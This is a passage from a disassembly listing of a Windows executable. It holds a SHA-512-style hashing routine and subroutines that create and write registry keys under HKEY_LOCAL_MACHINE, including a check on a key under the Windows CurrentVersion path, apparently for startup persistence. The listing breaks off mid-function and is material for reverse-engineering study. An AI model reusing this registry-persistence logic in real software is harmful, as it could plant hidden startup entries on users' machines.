xor esi, esi
or esi, edi
shr ecx, 1
mov edi, eax
mov edx, eax
shr ebx, 8
shl edi, 1Fh
or edi, ecx
mov ecx, [esp+170h+var_9C]
shrd eax, ecx, 7
shl edx, 18h
or edx, ebx
xor ebx, ebx
or ebx, ebp
xor esi, ebx
xor esi, eax
mov eax, [esp+170h+var_F8]
xor edx, edi
shr ecx, 7
xor edx, ecx
mov ecx, [esp+170h+var_F4]
mov ebx, eax
mov ebp, ecx
shrd ebx, ebp, 13h
xor edi, edi
or edi, ebx
mov ebx, ecx
mov [esp+170h+var_160], esi
mov esi, eax
shld ecx, eax, 3
add eax, eax
add eax, eax
shl esi, 0Dh
shr ebp, 13h
or esi, ebp
add eax, eax
shr ebx, 1Dh
or ebx, eax
mov eax, [esp+170h+var_F8]
xor ebp, ebp
or ebp, ecx
mov ecx, [esp+170h+var_F4]
shrd eax, ecx, 6
shr ecx, 6
xor esi, ebp
xor edi, ebx
xor esi, ecx
mov ecx, [esp+170h+var_160]
xor edi, eax
mov eax, [esp+170h+arg_0]
add ecx, edi
adc edx, esi
add ecx, [esp+170h+var_D8]
adc edx, [esp+170h+var_D4]
add ecx, [esp+170h+var_C0]
adc edx, [esp+170h+var_BC]
mov [eax+0B8h], ecx
mov [eax+0BCh], edx
mov eax, edx
mov [esp+170h+var_C0], ecx
mov [esp+170h+var_BC], eax
mov [esp+170h+var_30], ecx
jmp short loc_416454
; ---------------------------------------------------------------------------
loc_41643F: ; CODE XREF: sub_4143D0+1F7E�j
mov edx, [esp+170h+var_C0]
mov eax, [esp+170h+var_BC]
mov [esp+170h+var_30], edx
loc_416454: ; CODE XREF: sub_4143D0+206D�j
mov ecx, [esp+170h+var_11C]
mov ebx, ecx
mov [esp+170h+var_2C], eax
mov eax, [esp+170h+var_120]
xor esi, esi
mov edx, ecx
mov edi, eax
shld ebx, edi, 17h
or esi, ebx
shl edi, 17h
xor ebx, ebx
shr edx, 9
or edx, edi
mov ebp, eax
shrd ebp, ecx, 12h
or ebx, ebp
mov ebp, [esp+170h+var_11C]
xor edx, ebx
shr ecx, 12h
mov edi, eax
shl edi, 0Eh
or edi, ecx
xor esi, edi
mov ebx, eax
shrd ebx, ebp, 0Eh
shr ebp, 0Eh
xor edi, edi
or edi, ebx
xor edx, edi
mov ecx, eax
shl ecx, 12h
or ecx, ebp
mov ebp, [esp+170h+var_158]
xor esi, ecx
mov ecx, [esp+170h+var_11C]
and ebp, eax
mov edi, eax
mov eax, [esp+170h+var_154]
and eax, ecx
mov ebx, ecx
mov ecx, [esp+170h+var_148]
not ebx
and ebx, [esp+170h+var_14C]
not edi
and edi, [esp+170h+var_150]
xor ebx, eax
mov eax, [esp+170h+var_15C]
xor edi, ebp
add edx, edi
adc esi, ebx
add edx, ds:dword_41F9B8[eax*8]
adc esi, ds:dword_41F9BC[eax*8]
add edx, [esp+170h+var_30]
mov eax, [esp+170h+var_128]
adc esi, [esp+170h+var_2C]
add ecx, edx
mov edx, [esp+170h+var_144]
adc edx, esi
add eax, ecx
adc [esp+170h+var_124], edx
mov [esp+170h+var_148], ecx
mov ecx, [esp+170h+var_140]
mov [esp+170h+var_144], edx
mov edx, [esp+170h+var_13C]
mov ebx, ecx
mov ebp, edx
shrd ebx, ebp, 1Ch
xor edi, edi
or edi, ebx
mov esi, ecx
mov ebx, edx
shld edx, ecx, 1Eh
shr ebp, 1Ch
shl esi, 4
or esi, ebp
shr ebx, 2
shl ecx, 1Eh
xor ebp, ebp
or ebx, ecx
mov [esp+170h+var_128], eax
or ebp, edx
mov ecx, [esp+170h+var_13C]
xor esi, ebp
mov ebp, [esp+170h+var_140]
mov edx, ecx
shld ecx, ebp, 19h
xor edi, ebx
shr edx, 7
xor ebx, ebx
or ebx, ecx
mov ecx, [esp+170h+var_98]
and ecx, [esp+170h+var_140]
shl ebp, 19h
xor ecx, [esp+170h+var_90]
or edx, ebp
xor edi, edx
mov edx, [esp+170h+var_94]
and edx, [esp+170h+var_13C]
xor esi, ebx
xor edx, [esp+170h+var_8C]
add edi, ecx
adc esi, edx
add [esp+170h+var_148], edi
adc [esp+170h+var_144], esi
cmp [esp+170h+var_15C], 0
jz loc_4166A0
mov eax, [esp+170h+var_B0]
mov ecx, [esp+170h+var_AC]
mov ebx, ecx
mov edi, eax
shrd edi, ebx, 13h
xor esi, esi
or esi, edi
mov edi, ecx
shr ebx, 13h
mov edx, eax
mov ebp, eax
shld ecx, ebp, 3
shl edx, 0Dh
or edx, ebx
xor ebx, ebx
or ebx, ecx
mov ecx, [esp+170h+var_AC]
shrd eax, ecx, 6
add ebp, ebp
add ebp, ebp
add ebp, ebp
shr edi, 1Dh
or edi, ebp
xor esi, edi
xor esi, eax
mov eax, [esp+170h+var_E0]
xor edx, ebx
shr ecx, 6
xor edx, ecx
mov ecx, [esp+170h+var_DC]
mov ebp, ecx
mov ebx, eax
shrd ebx, ebp, 8
xor edi, edi
or edi, ebx
mov [esp+170h+var_160], esi
mov esi, eax
mov ebx, eax
shrd eax, ecx, 1
shl esi, 18h
shr ebp, 8
or esi, ebp
shr ecx, 1
xor ebp, ebp
or ebp, eax
mov eax, [esp+170h+var_E0]
shl ebx, 1Fh
or ebx, ecx
mov ecx, [esp+170h+var_DC]
shrd eax, ecx, 7
shr ecx, 7
xor esi, ebx
xor edi, ebp
xor edi, eax
mov eax, [esp+170h+arg_0]
xor esi, ecx
mov ecx, [esp+170h+var_160]
add ecx, edi
adc edx, esi
add ecx, [esp+170h+var_118]
adc edx, [esp+170h+var_114]
add ecx, [esp+170h+var_A0]
adc edx, [esp+170h+var_9C]
mov [eax+0C0h], ecx
mov [eax+0C4h], edx
mov eax, edx
mov [esp+170h+var_9C], eax
mov [esp+170h+var_1C], eax
mov eax, [esp+170h+var_128]
mov [esp+170h+var_A0], ecx
mov [esp+170h+var_20], ecx
jmp short loc_4166BC
; ---------------------------------------------------------------------------
loc_4166A0: ; CODE XREF: sub_4143D0+21CE�j
mov edx, [esp+170h+var_A0]
mov ecx, [esp+170h+var_9C]
mov [esp+170h+var_20], edx
mov [esp+170h+var_1C], ecx
loc_4166BC: ; CODE XREF: sub_4143D0+22CE�j
mov ecx, [esp+170h+var_124]
mov ebx, ecx
xor esi, esi
mov edx, ecx
mov edi, eax
shld ebx, edi, 17h
or esi, ebx
shl edi, 17h
xor ebx, ebx
shr edx, 9
or edx, edi
mov ebp, eax
shrd ebp, ecx, 12h
or ebx, ebp
mov ebp, [esp+170h+var_124]
xor edx, ebx
shr ecx, 12h
mov edi, eax
shl edi, 0Eh
or edi, ecx
xor esi, edi
mov ebx, eax
shrd ebx, ebp, 0Eh
xor edi, edi
or edi, ebx
xor edx, edi
shr ebp, 0Eh
mov ecx, eax
shl ecx, 12h
or ecx, ebp
mov ebp, [esp+170h+var_120]
xor esi, ecx
mov ecx, [esp+170h+var_124]
and ebp, eax
mov edi, eax
mov eax, [esp+170h+var_11C]
and eax, ecx
mov ebx, ecx
mov ecx, [esp+170h+var_14C]
not ebx
and ebx, [esp+170h+var_154]
not edi
and edi, [esp+170h+var_158]
xor ebx, eax
mov eax, [esp+170h+var_15C]
xor edi, ebp
add edx, edi
adc esi, ebx
add edx, ds:dword_41F9C0[eax*8]
adc esi, ds:dword_41F9C4[eax*8]
add edx, [esp+170h+var_20]
mov eax, [esp+170h+var_150]
adc esi, [esp+170h+var_1C]
add eax, edx
adc ecx, esi
add [esp+170h+var_130], eax
mov [esp+170h+var_14C], ecx
mov [esp+170h+var_150], eax
adc [esp+170h+var_12C], ecx
mov eax, [esp+170h+var_144]
mov ecx, [esp+170h+var_148]
mov edx, ecx
mov ebx, eax
shrd edx, ebx, 1Ch
mov esi, ecx
xor edi, edi
or edi, edx
mov ebp, eax
shld ebp, ecx, 1Eh
shr ebx, 1Ch
shl esi, 4
or esi, ebx
mov edx, eax
shl ecx, 1Eh
shr edx, 2
xor ebx, ebx
or edx, ecx
or ebx, ebp
xor edi, edx
xor esi, ebx
mov ecx, eax
mov ebx, [esp+170h+var_148]
mov ebp, eax
shld ebp, ebx, 19h
xor edx, edx
or edx, ebp
mov ebp, [esp+170h+var_13C]
xor ebp, [esp+170h+var_134]
shl ebx, 19h
shr ecx, 7
or ecx, ebx
xor esi, edx
mov edx, [esp+170h+var_140]
xor edi, ecx
mov ecx, [esp+170h+var_138]
and ebp, eax
mov eax, [esp+170h+var_13C]
and eax, [esp+170h+var_134]
mov ebx, edx
xor ebx, ecx
and ebx, [esp+170h+var_148]
and edx, ecx
xor ebx, edx
xor ebp, eax
add edi, ebx
adc esi, ebp
add [esp+170h+var_150], edi
adc [esp+170h+var_14C], esi
cmp [esp+170h+var_15C], 0
jz loc_4168EA
mov eax, [esp+170h+var_C0]
mov ecx, [esp+170h+var_BC]
mov ebx, ecx
mov edi, eax
shrd edi, ebx, 13h
xor esi, esi
or esi, edi
mov edi, ecx
shr ebx, 13h
mov edx, eax
mov ebp, eax
shld ecx, ebp, 3
shl edx, 0Dh
or edx, ebx
xor ebx, ebx
or ebx, ecx
mov ecx, [esp+170h+var_BC]
shrd eax, ecx, 6
add ebp, ebp
add ebp, ebp
add ebp, ebp
shr edi, 1Dh
or edi, ebp
xor esi, edi
xor esi, eax
mov eax, [esp+170h+var_100]
xor edx, ebx
shr ecx, 6
xor edx, ecx
mov ecx, [esp+170h+var_FC]
mov ebp, ecx
mov ebx, eax
shrd ebx, ebp, 8
xor edi, edi
or edi, ebx
mov [esp+170h+var_160], esi
mov esi, eax
mov ebx, eax
shrd eax, ecx, 1
shl esi, 18h
shr ebp, 8
or esi, ebp
shr ecx, 1
xor ebp, ebp
or ebp, eax
mov eax, [esp+170h+var_100]
shl ebx, 1Fh
or ebx, ecx
mov ecx, [esp+170h+var_FC]
shrd eax, ecx, 7
shr ecx, 7
xor esi, ebx
xor edi, ebp
xor esi, ecx
mov ecx, [esp+170h+var_160]
xor edi, eax
mov eax, [esp+170h+arg_0]
add ecx, edi
adc edx, esi
add ecx, [esp+170h+var_C8]
adc edx, [esp+170h+var_C4]
add ecx, [esp+170h+var_E0]
adc edx, [esp+170h+var_DC]
mov [eax+0C8h], ecx
mov [eax+0CCh], edx
mov eax, edx
mov [esp+170h+var_E0], ecx
mov [esp+170h+var_DC], eax
mov [esp+170h+var_10], ecx
jmp short loc_4168FF
; ---------------------------------------------------------------------------
loc_4168EA: ; CODE XREF: sub_4143D0+2429�j
mov edx, [esp+170h+var_E0]
mov eax, [esp+170h+var_DC]
mov [esp+170h+var_10], edx
loc_4168FF: ; CODE XREF: sub_4143D0+2518�j
mov ecx, [esp+170h+var_12C]
mov ebx, ecx
mov [esp+170h+var_C], eax
mov eax, [esp+170h+var_130]
xor esi, esi
mov edx, ecx
mov edi, eax
shld ebx, edi, 17h
or esi, ebx
shl edi, 17h
xor ebx, ebx
shr edx, 9
or edx, edi
mov ebp, eax
shrd ebp, ecx, 12h
or ebx, ebp
mov ebp, [esp+170h+var_12C]
xor edx, ebx
shr ecx, 12h
mov edi, eax
shl edi, 0Eh
or edi, ecx
xor esi, edi
mov ebx, eax
shrd ebx, ebp, 0Eh
xor edi, edi
or edi, ebx
xor edx, edi
shr ebp, 0Eh
mov ecx, eax
shl ecx, 12h
or ecx, ebp
mov ebp, [esp+170h+var_128]
xor esi, ecx
mov ecx, [esp+170h+var_12C]
and ebp, eax
mov edi, eax
mov eax, [esp+170h+var_124]
and eax, ecx
mov ebx, ecx
mov ecx, [esp+170h+var_154]
not ebx
and ebx, [esp+170h+var_11C]
not edi
and edi, [esp+170h+var_120]
xor ebx, eax
mov eax, [esp+170h+var_15C]
xor edi, ebp
add edx, edi
adc esi, ebx
add edx, ds:dword_41F9C8[eax*8]
adc esi, ds:dword_41F9CC[eax*8]
add edx, [esp+170h+var_10]
mov eax, [esp+170h+var_158]
adc esi, [esp+170h+var_C]
add eax, edx
adc ecx, esi
add [esp+170h+var_138], eax
mov [esp+170h+var_154], ecx
mov [esp+170h+var_158], eax
adc [esp+170h+var_134], ecx
mov ecx, [esp+170h+var_150]
mov eax, [esp+170h+var_14C]
mov edx, ecx
mov ebx, eax
shrd edx, ebx, 1Ch
mov esi, ecx
mov ebp, eax
shld ebp, ecx, 1Eh
xor edi, edi
or edi, edx
shr ebx, 1Ch
shl esi, 4
or esi, ebx
mov edx, eax
shr edx, 2
shl ecx, 1Eh
xor ebx, ebx
or edx, ecx
or ebx, ebp
xor edi, edx
xor esi, ebx
mov ebx, [esp+170h+var_150]
mov ebp, eax
shld ebp, ebx, 19h
shl ebx, 19h
xor edx, edx
or edx, ebp
mov ecx, eax
shr ecx, 7
or ecx, ebx
xor edi, ecx
mov ecx, [esp+170h+var_150]
xor esi, edx
mov edx, [esp+170h+var_140]
mov ebx, ecx
and ecx, edx
xor ebx, edx
and ebx, [esp+170h+var_148]
mov ebp, eax
xor ebp, [esp+170h+var_13C]
mov edx, ecx
and ebp, [esp+170h+var_144]
mov ecx, [esp+170h+var_13C]
and eax, ecx
xor ebx, edx
xor ebp, eax
add edi, ebx
adc esi, ebp
add [esp+170h+var_158], edi
mov edi, [esp+170h+var_15C]
adc [esp+170h+var_154], esi
add edi, 10h
cmp edi, 50h
mov [esp+170h+var_15C], edi
jb loc_414560
mov eax, [esp+170h+var_4]
mov edx, [esp+170h+var_158]
add [eax], edx
mov edx, [esp+170h+var_154]
pop edi
adc [eax+4], edx
mov eax, [esp+16Ch+arg_0]
mov edx, [esp+16Ch+var_150]
add [eax+18h], edx
mov edx, [esp+16Ch+var_14C]
pop esi
adc [eax+1Ch], edx
mov edx, [esp+168h+var_148]
add [eax+20h], edx
mov edx, [esp+168h+var_144]
pop ebp
adc [eax+24h], edx
mov edx, [esp+164h+var_140]
add [eax+28h], edx
mov edx, [esp+164h+var_134]
pop ebx
adc [eax+2Ch], ecx
mov ecx, [esp+160h+var_138]
add [eax+30h], ecx
mov ecx, [esp+160h+var_130]
adc [eax+34h], edx
add [eax+38h], ecx
mov edx, [esp+160h+var_12C]
mov ecx, [esp+160h+var_128]
adc [eax+3Ch], edx
add [eax+40h], ecx
mov edx, [esp+160h+var_124]
mov ecx, [esp+160h+var_120]
adc [eax+44h], edx
add [eax+48h], ecx
mov edx, [esp+160h+var_11C]
adc [eax+4Ch], edx
add esp, 160h
retn
sub_4143D0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_416AE0 proc near ; CODE XREF: seg000:00416D62�p
; sub_41B7F9+CA�p
var_4 = dword ptr -4
arg_0 = dword ptr 4
push ecx
mov ecx, [ebx]
push ebp
and ecx, 7Fh
push esi
lea esi, [ecx+7]
shr esi, 3
push edi
mov [esp+10h+var_4], ecx
jz short loc_416B45
lea edx, [ebx+esi*8+50h]
loc_416AF9: ; CODE XREF: sub_416AE0+5F�j
mov eax, [edx-8]
mov ecx, [edx-4]
sub edx, 8
mov edi, eax
sub esi, 1
ror edi, 8
and edi, 0FF00FF00h
rol eax, 8
and eax, 0FF00FFh
or edi, eax
mov ebp, ecx
xor eax, eax
ror ebp, 8
and ebp, 0FF00FF00h
rol ecx, 8
and ecx, 0FF00FFh
or ebp, ecx
xor ecx, ecx
or eax, ebp
or edi, ecx
test esi, esi
mov [edx], eax
mov [edx+4], edi
jnz short loc_416AF9
mov ecx, [esp+10h+var_4]
loc_416B45: ; CODE XREF: sub_416AE0+13�j
mov eax, ecx
and eax, 7
add eax, eax
add eax, eax
mov esi, ds:dword_4249C0[eax+eax]
mov edi, ds:dword_4249C4[eax+eax]
add eax, eax
mov edx, ecx
shr edx, 3
and esi, [ebx+edx*8+50h]
and edi, [ebx+edx*8+54h]
or esi, ds:dword_424A00[eax]
or edi, ds:dword_424A04[eax]
cmp ecx, 6Fh
mov [ebx+edx*8+50h], esi
mov [ebx+edx*8+54h], edi
jbe short loc_416BAA
cmp ecx, 78h
jnb short loc_416B9D
mov dword ptr [ebx+0C8h], 0
mov dword ptr [ebx+0CCh], 0
loc_416B9D: ; CODE XREF: sub_416AE0+A7�j
push ebx
call sub_4143D0
add esp, 4
xor edx, edx
jmp short loc_416BB2
; ---------------------------------------------------------------------------
loc_416BAA: ; CODE XREF: sub_416AE0+A2�j
add edx, 1
cmp edx, 0Eh
jnb short loc_416BD8
loc_416BB2: ; CODE XREF: sub_416AE0+C8�j
mov ecx, 0Dh
sub ecx, edx
add ecx, ecx
add ecx, ecx
lea esi, [ebx+edx*8+50h]
add ecx, ecx
shr ecx, 2
lea edi, [esi+8]
mov dword ptr [esi], 0
mov dword ptr [esi+4], 0
rep movsd
loc_416BD8: ; CODE XREF: sub_416AE0+D0�j
mov edx, [ebx+8]
mov esi, [ebx+0Ch]
mov ecx, [ebx+4]
mov eax, [ebx]
shld esi, edx, 3
add edx, edx
mov edi, ecx
shld ecx, eax, 3
add edx, edx
add eax, eax
add edx, edx
add eax, eax
shr edi, 1Dh
xor ebp, ebp
or edx, edi
add eax, eax
or esi, ebp
push ebx
mov [ebx+0C0h], edx
mov [ebx+0C4h], esi
mov [ebx+0C8h], eax
mov [ebx+0CCh], ecx
call sub_4143D0
add esp, 4
xor esi, esi
loc_416C25: ; CODE XREF: sub_416AE0+171�j
mov ecx, esi
not ecx
and ecx, 7
mov edx, esi
shr edx, 3
mov eax, [ebx+edx*8+10h]
mov edx, [ebx+edx*8+14h]
add ecx, ecx
add ecx, ecx
add ecx, ecx
call sub_4118E0
mov ecx, [esp+10h+arg_0]
mov [esi+ecx], al
add esi, 1
cmp esi, 40h
jb short loc_416C25
pop edi
pop esi
pop ebp
pop ecx
retn
sub_416AE0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_416C60 proc near ; CODE XREF: sub_41B7F9+A3�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 4
arg_4 = dword ptr 8
sub esp, 0Ch
push ebx
mov ebx, [esp+10h+arg_4]
mov eax, [ebx]
push ebp
mov ebp, [esp+14h+arg_0]
push esi
push edi
and eax, 7Fh
mov edi, 80h
sub edi, eax
mov esi, ecx
xor ecx, ecx
add [ebx], ebp
adc [ebx+4], ecx
mov edx, [ebx+4]
cmp edx, ecx
ja short loc_416C9B
jb short loc_416C93
mov ecx, [ebx]
cmp ecx, ebp
jnb short loc_416C9B
loc_416C93: ; CODE XREF: sub_416C60+2B�j
add dword ptr [ebx+8], 1
adc dword ptr [ebx+0Ch], 0
loc_416C9B: ; CODE XREF: sub_416C60+29�j
; sub_416C60+31�j
cmp ebp, edi
jb loc_416D3F
loc_416CA3: ; CODE XREF: sub_416C60+D9�j
push edi
lea edx, [ebx+eax+50h]
push esi
push edx
call sub_407BF0
add esi, edi
add esp, 0Ch
sub ebp, edi
mov [esp+1Ch+var_4], esi
mov [esp+1Ch+arg_0], ebp
mov edi, 80h
mov [esp+1Ch+var_8], 0
mov esi, 10h
lea edx, [ebx+0D0h]
loc_416CD6: ; CODE XREF: sub_416C60+BC�j
mov eax, [edx-8]
mov ecx, [edx-4]
sub edx, 8
mov ebx, eax
sub esi, 1
ror ebx, 8
and ebx, 0FF00FF00h
rol eax, 8
and eax, 0FF00FFh
or ebx, eax
mov ebp, ecx
xor eax, eax
ror ebp, 8
and ebp, 0FF00FF00h
rol ecx, 8
and ecx, 0FF00FFh
or ebp, ecx
xor ecx, ecx
or eax, ebp
or ebx, ecx
test esi, esi
mov [edx], eax
mov [edx+4], ebx
jnz short loc_416CD6
mov ebx, [esp+1Ch+arg_4]
push ebx
call sub_4143D0
mov ebp, [esp+20h+arg_0]
mov eax, [esp+20h+var_8]
mov esi, [esp+20h+var_4]
add esp, 4
cmp ebp, edi
jnb loc_416CA3
loc_416D3F: ; CODE XREF: sub_416C60+3D�j
push ebp
lea edx, [eax+ebx+50h]
push esi
push edx
call sub_407BF0
add esp, 0Ch
pop edi
pop esi
pop ebp
pop ebx
add esp, 0Ch
retn
sub_416C60 endp
; ---------------------------------------------------------------------------
align 10h
push ecx
push eax
call sub_416AE0
add esp, 4
pop ecx
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416D6C proc near ; CODE XREF: sub_416D6C+D5�p
; sub_41A9DE+67F�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_C = word ptr 14h
arg_14 = dword ptr 1Ch
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
arg_24 = dword ptr 2Ch
arg_28 = byte ptr 30h
arg_2B = byte ptr 33h
push ebp
mov ebp, esp
push ecx
push ecx
cmp [ebp+arg_28], 0
push ebx
push esi
push edi
jz short loc_416D85
mov ecx, [ebp+arg_4]
shr ecx, 18h
or cl, 1
jmp short loc_416D8B
; ---------------------------------------------------------------------------
loc_416D85: ; CODE XREF: sub_416D6C+C�j
mov cl, byte ptr [ebp+arg_4+3]
and cl, 0FEh
loc_416D8B: ; CODE XREF: sub_416D6C+17�j
movzx eax, word ptr [ebp+arg_24]
mov ebx, [ebp+arg_20]
lea edx, [ebx+18h]
cmp edx, eax
ja short loc_416DA8
lea edx, [ebx+18h]
mov [ebp+arg_14], ebx
or cl, 2
mov [ebp+arg_2B], 0
jmp short loc_416DB9
; ---------------------------------------------------------------------------
loc_416DA8: ; CODE XREF: sub_416D6C+2B�j
mov dx, word ptr [ebp+arg_24]
add eax, 0FFFFFFE8h
mov [ebp+arg_14], eax
and cl, 0FDh
mov [ebp+arg_2B], 1
loc_416DB9: ; CODE XREF: sub_416D6C+3A�j
movzx eax, dx
push eax
mov byte ptr [ebp+arg_4+3], cl
mov [ebp+arg_C], dx
mov [ebp+var_4], eax
call sub_4036E0
test eax, eax
pop ecx
mov [ebp+arg_20], eax
jz loc_416E58
push 6
pop ecx
mov edi, eax
lea esi, [ebp+arg_4]
rep movsd
mov edi, [ebp+arg_14]
mov esi, [ebp+arg_1C]
push edi
add eax, 18h
push esi
push eax
call sub_407BF0
add esp, 0Ch
push 0
lea eax, [ebp+var_8]
push eax
push [ebp+var_4]
push [ebp+arg_20]
push [ebp+arg_0]
call ds:dword_41D088
test eax, eax
jz short loc_416E4F
mov eax, [ebp+var_4]
cmp [ebp+var_8], eax
jnz short loc_416E4F
push [ebp+arg_20]
call sub_403603
cmp [ebp+arg_2B], 0
pop ecx
jz short loc_416E4B
push 0
push [ebp+arg_24]
sub ebx, edi
push ebx
add edi, esi
push edi
sub esp, 18h
push 6
pop ecx
mov edi, esp
push [ebp+arg_0]
lea esi, [ebp+arg_4]
rep movsd
call sub_416D6C
add esp, 2Ch
jmp short loc_416E5A
; ---------------------------------------------------------------------------
loc_416E4B: ; CODE XREF: sub_416D6C+B8�j
mov al, 1
jmp short loc_416E5A
; ---------------------------------------------------------------------------
loc_416E4F: ; CODE XREF: sub_416D6C+A1�j
; sub_416D6C+A9�j
push [ebp+arg_20]
call sub_403603
pop ecx
loc_416E58: ; CODE XREF: sub_416D6C+66�j
xor al, al
loc_416E5A: ; CODE XREF: sub_416D6C+DD�j
; sub_416D6C+E1�j
pop edi
pop esi
pop ebx
leave
retn
sub_416D6C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416E5F proc near ; CODE XREF: sub_416F86+154�p
; sub_417119+152�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ebx
xor ebx, ebx
push ebx
lea eax, [ebp+var_4]
push eax
push ebx
push 0F003Fh
push ebx
push ebx
push ebx
push [ebp+arg_0]
push 80000002h
call ds:dword_41D004
test eax, eax
jz short loc_416E94
push [ebp+var_4]
call ds:dword_41D010
xor al, al
loc_416E91: ; CODE XREF: sub_416E5F+68�j
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_416E94: ; CODE XREF: sub_416E5F+25�j
mov eax, [ebp+arg_8]
push esi
lea esi, [eax+1]
loc_416E9B: ; CODE XREF: sub_416E5F+41�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_416E9B
sub eax, esi
push eax
push [ebp+arg_8]
push 1
push ebx
push [ebp+arg_4]
push [ebp+var_4]
call ds:dword_41D00C
test eax, eax
pop esi
jz short loc_416EC9
loc_416EBC: ; CODE XREF: sub_416E5F+6C�j
push [ebp+var_4]
call ds:dword_41D010
mov al, bl
jmp short loc_416E91
; ---------------------------------------------------------------------------
loc_416EC9: ; CODE XREF: sub_416E5F+5B�j
mov bl, 1
jmp short loc_416EBC
sub_416E5F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416ECD proc near ; CODE XREF: sub_416F86+113�p
; sub_417119+100�p ...
var_4 = dword ptr -4
arg_0 = byte ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ecx
lea eax, [ebp+var_4]
push eax
push 1
push 0
push [ebp+arg_4]
push 80000002h
call ds:dword_41D02C
test eax, eax
jnz short loc_416F15
lea eax, [ebp+arg_10]
push eax
push [ebp+arg_C]
lea eax, [ebp+arg_0]
push eax
push 0
push [ebp+arg_8]
push [ebp+var_4]
call ds:dword_41D008
test eax, eax
jnz short loc_416F15
push [ebp+var_4]
call ds:dword_41D010
mov al, 1
leave
retn
; ---------------------------------------------------------------------------
loc_416F15: ; CODE XREF: sub_416ECD+1C�j
; sub_416ECD+39�j
push [ebp+var_4]
call ds:dword_41D010
push [ebp+arg_10]
push 0
push [ebp+arg_C]
call sub_407B70
add esp, 0Ch
xor al, al
leave
retn
sub_416ECD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416F32 proc near ; CODE XREF: sub_419477+134�p
; sub_419A9F+F2�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ebx
xor ebx, ebx
push ebx
lea eax, [ebp+var_4]
push eax
push ebx
push 0F003Fh
push ebx
push ebx
push ebx
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_41D004
test eax, eax
jz short loc_416F65
push [ebp+var_4]
call ds:dword_41D010
xor al, al
loc_416F62: ; CODE XREF: sub_416F32+4E�j
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_416F65: ; CODE XREF: sub_416F32+23�j
push [ebp+arg_8]
push [ebp+var_4]
call ds:dword_41D000
test eax, eax
jz short loc_416F82
loc_416F75: ; CODE XREF: sub_416F32+52�j
push [ebp+var_4]
call ds:dword_41D010
mov al, bl
jmp short loc_416F62
; ---------------------------------------------------------------------------
loc_416F82: ; CODE XREF: sub_416F32+41�j
mov bl, 1
jmp short loc_416F75
sub_416F32 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=94h
sub_416F86 proc near ; CODE XREF: seg000:loc_41BF0D�p
var_114 = dword ptr -114h
var_110 = dword ptr -110h
var_10C = dword ptr -10Ch
var_108 = dword ptr -108h
var_104 = byte ptr -104h
var_4 = dword ptr -4
push ebp
lea ebp, [esp-94h]
sub esp, 114h
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+94h+var_4], eax
push ebx
push esi
push edi
mov edi, 100h
push edi
call sub_402648
mov esi, eax
push edi
mov [ebp+94h+var_110], esi
call sub_402648
push edi
mov [ebp+94h+var_108], eax
call sub_402648
push edi
mov [ebp+94h+var_114], eax
call sub_402648
push [ebp+94h+var_114]
mov [ebp+94h+var_10C], eax
call sub_402A45
push eax
xor ebx, ebx
push ebx
push [ebp+94h+var_114]
call sub_407B70
push [ebp+94h+var_10C]
call sub_402A45
push eax
push ebx
push [ebp+94h+var_10C]
call sub_407B70
push edi
lea eax, [ebp+94h+var_104]
push ebx
push eax
call sub_407B70
push esi
call sub_402A45
add esp, 40h
push eax
push ebx
push esi
call sub_407B70
push [ebp+94h+var_108]
call sub_402A45
push eax
push ebx
push [ebp+94h+var_108]
call sub_407B70
push esi
call sub_402A45
push eax
mov ebx, offset byte_425119
call sub_4196D1
mov esi, [ebp+94h+var_108]
push esi
call sub_402A45
push eax
mov ebx, offset byte_425061
call sub_4196D1
mov ebx, [ebp+94h+var_114]
push ebx
call sub_402A45
add esp, 30h
dec eax
push eax
push ebx
call ds:dword_41D0F4
push esi
mov esi, [ebp+94h+var_10C]
push ebx
push offset dword_4200F0
push esi
call sub_402A45
pop ecx
dec eax
push eax
push esi
call sub_402AEE
mov eax, esi
add esp, 14h
lea ecx, [eax+1]
loc_41707E: ; CODE XREF: sub_416F86+FD�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_41707E
sub eax, ecx
push edi
mov [eax+esi], dl
lea eax, [ebp+94h+var_104]
push eax
push [ebp+94h+var_110]
push offset aSoftwareMicr_6 ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push 1
call sub_416ECD
add esp, 14h
test al, al
jz short loc_4170D1
lea eax, [ebp+94h+var_104]
mov ecx, esi
loc_4170AA: ; CODE XREF: sub_416F86+13C�j
mov dl, [ecx]
cmp dl, [eax]
jnz short loc_4170C8
test dl, dl
jz short loc_4170C4
mov dl, [ecx+1]
cmp dl, [eax+1]
jnz short loc_4170C8
inc ecx
inc ecx
inc eax
inc eax
test dl, dl
jnz short loc_4170AA
loc_4170C4: ; CODE XREF: sub_416F86+12C�j
xor eax, eax
jmp short loc_4170CD
; ---------------------------------------------------------------------------
loc_4170C8: ; CODE XREF: sub_416F86+128�j
; sub_416F86+134�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_4170CD: ; CODE XREF: sub_416F86+140�j
test eax, eax
jz short loc_4170E2
loc_4170D1: ; CODE XREF: sub_416F86+11D�j
push esi
push [ebp+94h+var_110]
